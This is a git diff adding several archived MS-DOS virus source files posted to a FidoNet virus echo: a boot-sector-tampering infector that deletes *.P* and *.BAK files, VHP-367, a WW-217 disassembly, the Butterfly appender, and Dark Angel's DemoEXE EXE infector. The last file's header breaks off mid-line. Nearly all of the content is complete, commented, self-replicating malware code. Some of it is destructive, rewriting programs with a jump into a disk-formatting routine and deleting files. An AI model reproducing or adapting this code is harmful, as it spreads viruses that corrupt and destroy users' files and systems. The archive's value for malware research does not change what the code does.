db 0, '????????P??' +allbak db 0, '????????BAK' +maxdrv db ? +sign db 'ICS 89' + +v_entry: + push ax ; Save AX & DX + push dx + + mov ah,19 ; Get the default drive + int 21 + push ax ; Save it on stack + mov ah,0E ; Set it as default (?!) + mov dl,al + int 21 ; Do it + + call self ; Determine the virus' start address +self: + pop si + sub si,offset self-v_const + +; Save the number of logical drives in the system: + + mov byte ptr [si+offset maxdrv-v_const],al + +; Restore the first 4 bytes of the infected program: + + mov ax,[si+offset first4-v_const] + mov word ptr ds:[offset start],ax + mov ax,[si+offset first4+2-v_const] + mov word ptr ds:[offset start+2],ax + + mov ah,1A ; Set new DTA + lea dx,[si+offset mydta-v_const] + int 21 ; Do it + + pop ax ; Restore current drive in AL + push ax ; Keep it on stack + + call inf_drive ; Proceed with the current drive + + xor al,al ; For all logical drives in the system +drv_lp: + call inf_drive ; Proceed with drive + jbe drv_lp ; Loop until no more drives + + pop ax ; Restore the saved current drive + mov ah,0E ; Set it as current drive + mov dl,al + int 21 ; Do it + + mov dx,80 ; Restore original DTA + mov ah,1A + int 21 ; Do it + + mov si,offset start + pop dx ; Restore DX & AX + pop ax + jmp si ; Run the original program + +inf_drive: + push ax ; Save the selected drive number on stack + mov ah,0E ; Select that drive + mov dl,al + int 21 ; Do ti + pop ax ; Restore AX + + push ax ; Save the registers used + push bx + push cx + push si ; Save SI + + mov cx,1 ; Read the boot sector of the drive specified + xor dx,dx + lea bx,[si+offset v_end-v_const] + push ax ; Save AX + push bx ; Save BX, CX & DX also + push cx + push dx + int 25 ; Do read + pop dx ; Clear the stack + pop dx ; Restore saved DX, CX & BX + pop cx + pop bx + jc bad_drv ; Exit on error + + inc byte ptr [bx] ; Increment the first byte (?!) + cmp byte ptr [bx+1],6F ; Second byte == 111 (?!) + jne wr_drive ; Write the new values if not + +bad_drv: + pop ax ; Restore AX + pop si ; Restore SI +drv_xit: + pop cx ; Restore used registers + pop bx + pop ax + + inc al ; Go to next drive number + cmp al,[si+offset maxdrv-v_const] ; See if there are more drives + ret ; Exit + +wr_drive: + pop ax ; Restore drive number in AL + int 26 ; Do write + pop ax ; Clear the stack + pop si ; Restore Si + jc drv_xit ; Exit on error + +; Find first COM file on the current directory of the selected drive: + + mov ah,4E + xor cx,cx ; Normal files only + lea dx,[si+offset allcom-v_const] ; File mask +next: + int 21 ; Do find + jc no_more ; Quit search if no more such files + lea dx,[si+offset namez-v_const] ; Get file name found + call infect ; Infect that file + mov ah,4F ; Prepare for FindNext + jc next ; If infection not successful, go to next file + jmp drv_xit ; Otherwise quit + +no_more: + lea di,[si+offset v_end-v_const] + cmp byte ptr [di],'Z' + jb drv_xit + + mov ah,13 ; Delete all *.P* files in that dir + lea dx,[si+offset allp-v_const] + int 21 ; Do it + cmp al,-1 + je drv_xit ; Exit on error + + mov ah,13 ; Delete all *.BAK files too + lea dx,[si+offset allbak-v_const] + int 21 ; Do it + + jmp drv_xit ; Done. Exit + +namaddr dw ? ; Address of the file name buffer + +infect: + mov [si+offset namaddr-v_const],dx ; Save file name address + + mov ax,4301 ; Reset all file attributes + xor cx,cx + int 21 ; Do it + jnc inf_cont ; Continue if all OK +inf_xit: + ret ; Otherwise exit + +inf_cont: + mov ax,3D02 ; Open file for both reading and writing + int 21 + jc inf_xit ; Exit on arror + mov bx,ax ; Save file handle in BX + + mov cx,4 ; Read the first 4 bytes of the file + mov ah,3F + lea di,[si+offset first4-v_const] ; Save them in first4 + mov dx,di + int 21 ; Do it + jc quit ; Exit on error + + cmp byte ptr [di+3],0CA ; File already infected? + stc ; Set CF to indicate it + jz quit ; Don't touch this file if so + + mov cx,[si+offset fsize-v_const] + cmp cx,2048d ; Check if file size >= 2048 bytes + jb quit ; Exit if not + cmp cx,64000d ; Check if file size <= 64000 bytes + stc ; Set CF to indicate it + ja quit ; Exit if not + + xor cx,cx ; Seek to file end + xor dx,dx + mov ax,4202 + int 21 ; Do it + push ax ; Save file size on stack + jc quit ; Exit on error + +; Write the virus body after the end of file: + + mov cx,v_end-v_start + nop + lea dx,[si+offset v_start-v_const] + mov ah,40 + int 21 ; Do it + jc quit ; Exit on error + pop ax ; Restore file size in AX + +; Form a new address for the first JMP instruction in AX: + + add ax,v_entry-v_start-3 + mov byte ptr [di],0E9 ; JMP opcode + mov [di+1],ax + mov byte ptr [di+3],0CA ; Set the "file infected" sign + + xor cx,cx ; Seek to file beginning + xor dx,dx + mov ax,4200 + int 21 ; Do it + jc quit ; Exit on error + + mov cx,4 ; Write the new first 4 bytes of the file + mov dx,di + mov ah,40 + int 21 ; Do it + +quit: + pushf ; Save flags + + mov ax,5701 ; Set file date & time + mov cx,[si+offset time-v_const] ; Get time from mydta + mov dx,[si+offset date-v_const] ; Get date from mydta + int 21 ; Do it + + mov ah,3E ; Close the file + int 21 + + mov ax,4301 ; Set file attributes + mov cl,[si+offset attrib-v_const] ; Get them from mydta + xor ch,ch + mov dx,[si+offset namaddr-v_const] ; Point to file name + int 21 ; Do it + + popf ; Restore flags + ret + +v_end equ $ + +code ends + end start + +;-+- CrossPoint v3.02 +; + Origin: Hard disks never die... (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/i Initialize all segments +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir57.asm b/MSDOS/Virus.MSDOS.Unknown.vir57.asm new file mode 100644 index 00000000..3d0e64d2 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir57.asm @@ -0,0 +1,312 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 47 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:17 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : V_VHP367.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Graham Allen, 2:283/718 (06 Nov 94 17:55) +;* To : Adam Happ +;* Subj : V_VHP367.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Graham.Allen@f718.n283.z2.fidonet.org + page ,132 + name VHP_367 + title Virus; based on the famous VHP-648 virus + .radix 16 + +code segment + assume cs:code,ds:code + + org 100 + +environ equ 2C + +newjmp equ 7Bh ;Code of jmp instruction +codeptr equ 7A ;Here is formed a jump to the virus code +pname equ 78 ;Offset of file name in the dir path +poffs equ 76 ;Offset in the contents of the `PATH' variable +errhnd equ 74 ;Save place for the old error handler +fname equ 70 ;Path name to search for +mydta equ 2C ;DTA for Find First/Next: +attrib equ 17 ;File attribute +time equ 16 ;File time +date equ 14 ;File date +fsize equ 12 ;File size +namez equ 0E ;File name found + +start: + jmp short virus + nop + int 20 + +data label byte ;Data section +saveins db 3 dup (90) ;Original first 3 bytes +allcom db '*.COM',0 ;Filespec to search for +pathstr db 'PATH=' + +;This replaces the first instruction of a destroyed file. +;It's a jmp instruction into the hard disk formatting program (IBM XT only): + +bad_jmp db 0EA,6,0,0,0C8 + +virus: + mov di,offset start ;Push the program true start address + push di ; onto the stack + push ax ;Save AX + + call self ;Detrmine the virus start address + nop ;For those looking for the E80000 pattern +self: + pop bx + sub bx,self-data-1 ;Keep bx pointed at data + cld + lea si,[bx+saveins-data] ;Original instruction saved there + movsw ;Move 2 + 1 bytes + movsb + mov si,bx ;Keep SI pointed at data + + lea bp,[bx+endcode-data+7A] ;Reserve local storage + + mov ax,3524 ;Get interrupt 24h handler + int 21 ; and save it in errhnd + + mov [bp-errhnd],bx + mov [bp-errhnd+2],es + + mov ah,25 ;Set interrupt 24h handler + lea dx,[si+handler-data] + cmp al,0 ;DOS < 2.0 zeroes AL + je exit ;Exit if version < 2.0 + push ds + int 21 + + lea dx,[bp-mydta] + mov ah,1A ;Set DTA + int 21 + + push si ;Save SI + mov es,ds:[environ] ;Environment address + xor di,di ;Point ES:DI at the environment start + mov bx,si + mov al,0 ;0 means end of an enveronment variable +search: ;Search 'PATH' in the environment + lea si,[bx+pathstr-data] + mov cx,5 ;5 letters in 'PATH=' + repe cmpsb + je pfound ;PATH found, continue + mov ch,80 ;Maximum 32 K in environment + repne scasb ;If not, skip through next 0 + cmp al,es:[di] ;End of environment? + jne search ;If not, retry + xor di,di ;0 indicates no PATH found +pfound: + pop si ;Restore SI & ES + pop es + + mov [bp-poffs],di ;Save 'PATH' offset in poffs + lea di,[bp-fname] + mov [bp-pname],di + +filesrch: + lea si,[bx+allcom-data] + movsw + movsw ;Move '*.COM' at fname + movsw + mov si,bx ;Restore SI + + mov ah,4E ;Find first file + lea dx,[bp-fname] + mov cl,11b ;Hidden, Read/Only or Normal files + jmp short findfile + +checkfile: + mov al,[bp-time] ;Check file time + and al,11111b ; (the seconds, more exactly) + cmp al,62d/2 ;Are they 62? + +;If so, file is already contains the virus, search for another: + + je findnext + +;Is 10 <= file_size <= 64,000 bytes? + + sub word ptr [bp-fsize],10d + cmp [bp-fsize],64000d-10d+1 + jc process ;If so, process the file + +findnext: ;Otherwise find the next file + mov ah,4F ;Find next file +findfile: + int 21 + jnc checkfile ;If found, go chech some conditions + +nextdir: + mov si,[bp-poffs] ;Get the offset in the PATH variable + or si,si ;0 means end of PATH + jnz skip2 + +olddta: + push ds ;Save DS + mov ax,2524 ;Set interrupt 24h handler + lds dx,dword ptr [bp - errhnd] + int 21 + pop ds ;Restore DS + +exit: + mov ah,1A ;Set DTA + mov dx,80 ;Restore DTA + int 21 + + pop ax + ret ;Go to CS:IP by doing funny RET + +skip2: + push ds ;Save DS + lea di,[bp-fname] ;Point ES:DI at fname + mov ds,ds:[environ] ;Point DS:SI at the PATH variable found +cpydir: + lodsb ;Get a char from the PATH variable + cmp al,';' ;`;' means end of directory + je enddir + cmp al,0 ;0 means end of PATH variable + je endpath + stosb ;Put the char in fname + jmp cpydir ;Loop until done +endpath: + xor si,si ;Zero SI to indicate end of PATH +enddir: + pop ds ;Restore DS + mov [bp-poffs],si ;Save the new offset in the PATH variable + mov al,'\' ;Add '\' + stosb + mov [bp-pname],di + jmp filesrch ;And go find the first *.COM file + +process: + mov di,[bp-pname] + lea si,[bp-namez] ;Point SI at namez +cpyname: + lodsb ;Copy name found to fname + stosb + cmp al,0 + jne cpyname + mov si,bx ;Restore SI + + mov ax,4301 ;Set file attributes + call clr_cx_dos + + mov ax,3D02 ;Open file with Read/Write access + int 21 + jc oldattr ;Exit on error + mov bx,ax ;Save file handle in BX + + mov ah,2C ;Get system time + int 21 + and dh,111b ;Are seconds a multiple of 8? + jnz infect ;If not, contaminate file (don't destroy): + +;Destroy file by rewriting an illegal JMP as a first instruction: + + mov cx,5 ;Write 5 bytes + lea dx,[si+bad_jmp-data] ;Write THESE bytes + jmp short do_write ;Do it + +;Try to contaminate file: + +;Read first instruction of the file (first 3 bytes) and save it in saveins: + +infect: + mov ah,3F ;Read from file handle + mov cx,3 ;Read 3 bytes + lea dx,[si+saveins-data] ;Put them there + call dos_rw + jc oldtime ;Exit on error + +;Move file pointer to end of file: + + mov ax,4202 ;LSEEK from end of file + call clr_dx_cx_dos + + add ax,virus-data-3 ;Add virus data length to get code offset + mov [bp-codeptr],ax ;Save result in codeptr + + mov cx,endcode-data ;Virus code length as bytes to be written + mov dx,si ;Write from data to endcode + call dos_write ;Write to file handle + jc oldtime ;Exit on error + + call lseek ;LSEEK to the beginning of the file + +;Rewrite the first instruction of the file with a jump to the virus code: + + mov cl,3 ;3 bytes to write + lea dx,[bp-newjmp] ;Write THESE bytes +do_write: + call dos_write ;Write to file handle + +oldtime: + mov dx,[bp-date] ;Restore file date + mov cx,[bp-time] ; and time + or cl,11111b ;Set seconds to 62 (the virus' marker) + + mov ax,5701 ;Set file date & time + int 21 + mov ah,3E ;Close file handle + int 21 + +oldattr: + mov ax,4301 ;Set file attributes + mov cx,[bp-attrib] ;They were saved in attrib + and cx,3F + lea dx,[bp-fname] + int 21 ;Do it + jmp olddta ;And exit + +lseek: + mov ax,4200 ;LSEEK from the beginning of the file +clr_dx_cx_dos: + xor dx,dx ;From the very beginning +clr_cx_dos: + xor cx,cx ;Auxiliary entry point + db 3Dh ;Trick +dos_write: + mov ah,40 ;Write to file handle +dos_rw: + int 21 + jc dos_ret ;Exit on error + cmp ax,cx ;Set CF if AX < CX +dos_ret: + ret + +handler: ;Critical error handler + mov al,0 ;Just ignore the error + iret ; and return + + db 0E9 ;The JMP opcode + +endcode label byte + +code ends + end start + +;-+- GEcho 1.10+ +; + Origin: Hard disks never die... (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/d Warn if duplicate symbols in libraries +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir58.lst b/MSDOS/Virus.MSDOS.Unknown.vir58.lst new file mode 100644 index 00000000..60dad183 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir58.lst @@ -0,0 +1,180 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 48 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:17 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : WW_217.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Graham Allen, 2:283/718 (06 Nov 94 17:55) +;* To : Adam Happ +;* Subj : WW_217.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Graham.Allen@f718.n283.z2.fidonet.org +; new virus obtained from Marek Filipiak 1990-10-05 +; +; dissasembled by Andrzej Kadlof +; + + 0100 E90200 jmp 0105 + +; 0103 00F0 add al,dh + +;========================= +; virus main entry point + + 0105 E8BC00 call 01C4 ; set SI to start of virus code + + 0108 56 push si + +; restore main COM file + + 0109 81C6D201 add si,01D2 ; 3 oryginal bytes of victim + 010D BF0001 mov di,0100 + 0110 B90300 mov cx,0003 + 0113 F3A4 rep movsb + + 0115 5E pop si + 0116 B44E mov ah,4E ; find first + 0118 BAC901 mov dx,01C9 ; address of *.COM,0 in virus + 011B 01F2 add dx,si ; in memory + 011D B9FFFF mov cx,FFFF ; all posible atributes + 0120 CD21 int 21 + + 0122 723D jb 0161 ; no more files, return to main file + + 0124 52 push dx + 0125 B8023D mov ax,3D02 ; open file for read write + 0128 BA9E00 mov dx,009E ; DS:DX ASCIIZ file name + 012B CD21 int 21 + + 012D 722B jb 015A ; error + + 012F 8BD8 mov bx,ax ; store file handle + 0131 8B0E9C00 mov cx,[009C] ; file length in DTA + 0135 8B169A00 mov dx,[009A] + 0139 83EA02 sub dx,0002 ; move file pointer back two bytes + 013C B80142 mov ax,4201 + 013F CD21 int 21 + + 0141 BAD501 mov dx,01D5 ; buffer in virus body + 0144 01F2 add dx,si ; in memory + 0146 B90200 mov cx,0002 ; number of bytes + 0149 B43F mov ah,3F ; read file + 014B CD21 int 21 + + 014D 8B84D501 mov ax,[si+01D5] ; readed 2 bytes + 0151 3D5757 cmp ax,5757 ; WW virus sygnature + 0154 7510 jne 0166 ; file not infected + + 0156 B43E mov ah,3E ; close file + 0158 CD21 int 21 + + 015A 5A pop dx ; restore DTA + 015B B44F mov ah,4F ; find next + 015D CD21 int 21 + + 015F 73C3 jnb 0124 ; check file + +; return to main file + + 0161 BB0001 mov bx,0100 + 0164 FFE3 jmp bx + +;--------------- +; infect file + + 0166 A19A00 mov ax,[009A] ; file length + 0169 2D0300 sub ax,0003 ; starting adres in infected file + 016C 8984D001 mov [si+01D0],ax ; form JMP nnnn instruction + 0170 E83E00 call 01B1 ; move file pointer at the beginning + + 0173 BAD201 mov dx,01D2 ; buffer for first 3 bytes of victim + 0176 01F2 add dx,si ; in memory + 0178 B90300 mov cx,0003 ; number of bytes + 017B B43F mov ah,3F ; read file + 017D CD21 int 21 + + 017F E82F00 call 01B1 ; move file pointer at the begining + + 0182 BACF01 mov dx,01CF ; address of new starting bytes + 0185 01F2 add dx,si ; in memory + 0187 B90300 mov cx,0003 ; number of bytes + 018A B440 mov ah,40 ; write to file + 018C CD21 int 21 + + 018E E82500 call 01B6 ; move file pointer at the end of file + + 0191 8BD6 mov dx,si + 0193 81C20001 add dx,0100 ; virus code in memory + 0197 B9D900 mov cx,00D9 ; virus length + 019A B440 mov ah,40 ; write to file + 019C CD21 int 21 + + 019E B80157 mov ax,5701 ; set time/date file stamp + 01A1 8B0E9600 mov cx,[0096] ; restore from DTA + 01A5 8B169800 mov dx,[0098] + 01A9 CD21 int 21 + + 01AB B43E mov ah,3E ; close file + 01AD CD21 int 21 + + 01AF EBB0 jmp 0161 ; jump to main file + +;------------------------------------------------- +; move file pointer to the beginning of the file + + 01B1 B000 mov al,00 + 01B3 EB06 jmp 01BB + 01B5 90 nop + +;-------------------------------------- +; move file pointer to the end of file + + 01B6 B002 mov al,02 + 01B8 EB01 jmp 01BB + 01BA 90 nop + + 01BB B442 mov ah,42 + 01BD 31C9 xor cx,cx + 01BF 31D2 xor dx,dx + 01C1 CD21 int 21 + + 01C3 C3 ret + +;---------------------------------------------------- +; find address of first byte of virus code in memory + + 01C4 8BEC mov bp,sp + 01C6 8B7600 mov si,[bp] + 01C9 81EE0301 sub si,0103 + 01CD C3 ret + +;---------------- +; working area + + 01CE 2A 2E 43 4F 4D 00 ; *.COM, 0 + 01D4 E9 02 00 ; new first 3 bytes for victim + 01D7 EA F0 FF ; oryginal first 3 byte of victim + 01DA 00 F0 ; buffer for last 2 bytes of inspected file + 01DC 57 57 ; virus sygnature WW + +;-+- DinoMail v.1.0 Alpha +; + Origin: Hans' Point with DOSBoss West, Amsterdam (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/w-xxx,/w+xxx Disable (-) or enable (+) warning xxx +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir61.asm b/MSDOS/Virus.MSDOS.Unknown.vir61.asm new file mode 100644 index 00000000..50c5dbd6 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir61.asm @@ -0,0 +1,218 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 51 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:17 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : BUTTRFLY.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Hans Schotel, 2:283/718 (06 Nov 94 17:56) +;* To : Fred Lee +;* Subj : BUTTRFLY.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Hans.Schotel@f718.n283.z2.fidonet.org +Comment| +************************************************************************ + Virus Name: Butterfly Virus + Effective Length: 302 bytes + Disassembled by Silent Death - 1993 + + Notes: + - Non-Resident .COM appender + - infects up to 4 files in the current directory + - infected files have 01h as the 4th byte + - ok virus to learn off of but a lot of wasteful code + + To Compile: [Byte matchup!] + TASM /m File.asm + TLINK /t FILE.obj +************************************************************************| + + .model tiny + .code + org 100h + +start: + jmp virus + nop + nop + +oldjmp db 0cdh ; int 20h +newjmp db 20h + db 90h ; nop +id db 1 ; infection marker + +virus: + call delta ; get delta offset +delta: + pop bp + sub bp,10Bh ; adjust delta offset + + mov di,100h ; move bytes to the start + lea si,[bp+oldjmp] ; original starting + mov cx,4 ; move four bytes + cld ; clear direction flag + rep movsb ; move the bytes + + mov ah,1Ah ; set dta + lea dx,[bp+dta] ; set into heap + int 21h + + mov byte ptr [bp+offset counter],0 ; reset counter + + mov ah,4Eh ; find first asciiz file + lea si,[bp+dta+1eh] ; points to fname in dta + lea dx,[bp+fspec] ; files to find (*.COM) + push dx ; save file spec + jmp short findfiles + +returntohost: + mov ah,1Ah ; set dta + mov dx,80h ; to original position + int 21h + + xor ax,ax ; clear all registers + xor bx,bx ; no real need to + xor cx,cx + xor dx,dx + xor si,si + xor di,di + mov sp,0FFFEh ; adjust stack pointer + mov bp,100h ; return to here + push bp + xor bp,bp ; clear this + retn ; return to host + +closeup: + or bx,bx ; is handle 0? + jz findnext ; yup so don't bother closing + + mov ch,0 ; get attributes + mov cl,[bp+dta+15h] ; theres no point! + + mov ax,5701h ; set files date/time + mov cx,word ptr [bp+dta+16h]; get original time + mov dx,word ptr [bp+dta+18h]; get original date + int 21h + + mov ah,3Eh ; close file + int 21h + xor bx,bx ; delete handle + +findnext: + mov ah,4Fh ; find next file + +findfiles: + pop dx ; get filespec + push dx + mov cx,7 ; all attributes + xor bx,bx ; make sure no handle + int 21h + + jnc infect ; jump if file found + jmp returntohost2 ; no files found then quit + +vname db 0FFh + db 'Goddamn Butterflies' ; YA Know! + db 0FFh + +infect: + mov dx,si ; dx => fname in dta + + mov ax,3D02h ; open file read/write + int 21h + jc closeup ; if error close up, get another + mov bx,ax ; handle to bx + + mov ah,3Fh ; read from file + mov cx,4 ; four bytes + lea dx,[bp+oldjmp] ; save here + int 21h + + mov ax,word ptr [bp+dta+23h]; get end of filename + cmp ax,444Eh ; is file command.com? + je closeup ; yup so leave it + + cmp [bp+id],1 ; is file infected? + je closeup ; yup so leave it + + mov ax,word ptr [bp+dta+1ah]; get file size + cmp ax,121 ; is file smaller than 121? + jb closeup ; if it is leave it + + mov ax,4202h ; file pointer to end + cwd + xor cx,cx + int 21h + + cmp ax,64768 ; is file to big to infect + ja closeup ; if above then jump + + mov [bp+data],ax ; save file size + + lea dx,[bp+oldjmp] ; buffer to write from + mov cx,4 ; 4 bytes + mov ah,40h ; write oldjmp to end of file + int 21h + + lea dx,[bp+virus] ; start of virus + mov cx,12Ah ; write virus (298) to end + mov ah,40h ; write to file + int 21h + + mov ax,4200h ; file pointer to start + cwd + xor cx,cx + int 21h + + mov ax,[bp+data] ; get the file size + inc ax ; increment the file size + mov word ptr [bp+newjmp],ax ; save the new jump + mov [bp+oldjmp],0E9h ; new jump + mov [bp+id],1 ; infection marker + + lea dx,[bp+oldjmp] ; new jump + mov ah,40h ; write new start + mov cx,4 ; four bytes + int 21h + + inc [bp+counter] + cmp [bp+counter],4 ; has 4 files been infected? + jae returntohost3 ; yup so return to host + jmp closeup ; close current file + +returntohost2: ; This is a total waste! + mov di,100h ; start of file + cmp word ptr [di],20CDh ; are we the original + je returntohost3 ; yup + +returntohost3: + jmp returntohost + +fspec db '*.COM',0 ; files to find + +dta db 43 dup (0) ; holds dta +counter db 0 ; holds file counter +data dw 0 ; holds new jump offset + + end start + +;-+- Concord/QWK O.O1 Beta-7 +; + Origin: Data Fellows BBS (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/L Specify library search paths +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir62.asm b/MSDOS/Virus.MSDOS.Unknown.vir62.asm new file mode 100644 index 00000000..55bb7f28 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir62.asm @@ -0,0 +1,219 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 52 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:17 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : DEMOEXE.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Fred Lee, 2:283/718 (06 Nov 94 17:58) +;* To : Clif Jessop +;* Subj : DEMOEXE.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Fred.Lee@f718.n283.z2.fidonet.org + .model tiny ; Handy TASM directive + .code ; Virus code segment + org 100h ; COM file starting IP + ; Cheesy EXE infector + ; Written by Dark Angel of PHALCON/SKISM + ; For 40Hex Number 8 Volume 2 Issue 4 + id = 'DA' ; ID word for EXE infections + + startvirus: ; virus code starts here + call next ; calculate delta offset + next: pop bp ; bp = IP next + sub bp,offset next ; bp = delta offset + + push ds + push es + push cs ; DS = CS + pop ds + push cs ; ES = CS + pop es + lea si,[bp+jmpsave2] + lea di,[bp+jmpsave] + movsw + movsw + movsw + movsw + + mov ah,1Ah ; Set new DTA + lea dx,[bp+newDTA] ; new DTA @ DS:DX + int 21h + + lea dx,[bp+exe_mask] + mov ah,4eh ; find first file + mov cx,7 ; any attribute + findfirstnext: + int 21h ; DS:DX points to mask + jc done_infections ; No mo files found + + mov al,0h ; Open read only + call open + + mov ah,3fh ; Read file to buffer + lea dx,[bp+buffer] ; @ DS:DX + mov cx,1Ah ; 1Ah bytes + int 21h + + mov ah,3eh ; Close file + int 21h + + checkEXE: cmp word ptr [bp+buffer+10h],id ; is it already infected? + jnz infect_exe + find_next: + mov ah,4fh ; find next file + jmp short findfirstnext + done_infections: + mov ah,1ah ; restore DTA to default + mov dx,80h ; DTA in PSP + pop es + pop ds ; DS->PSP + int 21h + mov ax,es ; AX = PSP segment + add ax,10h ; Adjust for PSP + add word ptr cs:[si+jmpsave+2],ax + add ax,word ptr cs:[si+stacksave+2] + cli ; Clear intrpts for stack manip. + mov sp,word ptr cs:[si+stacksave] + mov ss,ax + sti + db 0eah ; jmp ssss:oooo + jmpsave dd ? ; Original CS:IP + stacksave dd ? ; Original SS:SP + jmpsave2 dd 0fff00000h ; Needed for carrier file + stacksave2 dd ? + + creator db '[MPC]',0,'Dark Angel of PHALCON/SKISM',0 + virusname db '[DemoEXE] for 40Hex',0 + + infect_exe: + les ax, dword ptr [bp+buffer+14h] ; Save old entry point + mov word ptr [bp+jmpsave2], ax + mov word ptr [bp+jmpsave2+2], es + + les ax, dword ptr [bp+buffer+0Eh] ; Save old stack + mov word ptr [bp+stacksave2], es + mov word ptr [bp+stacksave2+2], ax + + mov ax, word ptr [bp+buffer + 8] ; Get header size + mov cl, 4 ; convert to bytes + shl ax, cl + xchg ax, bx + + les ax, [bp+offset newDTA+26]; Get file size + mov dx, es ; to DX:AX + push ax + push dx + + sub ax, bx ; Subtract header size from + sbb dx, 0 ; file size + + mov cx, 10h ; Convert to segment:offset + div cx ; form + + mov word ptr [bp+buffer+14h], dx ; New entry point + mov word ptr [bp+buffer+16h], ax + + mov word ptr [bp+buffer+0Eh], ax ; and stack + mov word ptr [bp+buffer+10h], id + + pop dx ; get file length + pop ax + + add ax, heap-startvirus ; add virus size + adc dx, 0 + + mov cl, 9 ; 2**9 = 512 + push ax + shr ax, cl + ror dx, cl + stc + adc dx, ax ; filesize in pages + pop ax + and ah, 1 ; mod 512 + + mov word ptr [bp+buffer+4], dx ; new file size + mov word ptr [bp+buffer+2], ax + + push cs ; restore ES + pop es + + mov cx, 1ah + finishinfection: + push cx ; Save # bytes to write + xor cx,cx ; Clear attributes + call attributes ; Set file attributes + + mov al,2 + call open + + mov ah,40h ; Write to file + lea dx,[bp+buffer] ; Write from buffer + pop cx ; cx bytes + int 21h + + mov ax,4202h ; Move file pointer + xor cx,cx ; to end of file + cwd ; xor dx,dx + int 21h + + mov ah,40h ; Concatenate virus + lea dx,[bp+startvirus] + mov cx,heap-startvirus ; # bytes to write + int 21h + + mov ax,5701h ; Restore creation date/time + mov cx,word ptr [bp+newDTA+16h] ; time + mov dx,word ptr [bp+newDTA+18h] ; date + int 21h + + mov ah,3eh ; Close file + int 21h + + mov ch,0 + mov cl,byte ptr [bp+newDTA+15h] ; Restore original + call attributes ; attributes + + mo_infections: jmp find_next + + open: + mov ah,3dh + lea dx,[bp+newDTA+30] ; filename in DTA + int 21h + xchg ax,bx + ret + + attributes: + mov ax,4301h ; Set attributes to cx + lea dx,[bp+newDTA+30] ; filename in DTA + int 21h + ret + + exe_mask db '*.exe',0 + heap: ; Variables not in code + newDTA db 42 dup (?) ; Temporary DTA + buffer db 1ah dup (?) ; read buffer + endheap: ; End of virus + + end startvirus + +;-+- CrossPoint v3.02 +; + Origin: Data Fellows BBS (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/i Initialize all segments +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir63.asm b/MSDOS/Virus.MSDOS.Unknown.vir63.asm new file mode 100644 index 00000000..fcdf9f81 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir63.asm @@ -0,0 +1,222 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 53 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:17 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : KOD4_399.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Mark Hapershaw, 2:283/718 (06 Nov 94 17:58) +;* To : Mikko Hypponen +;* Subj : KOD4_399.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: 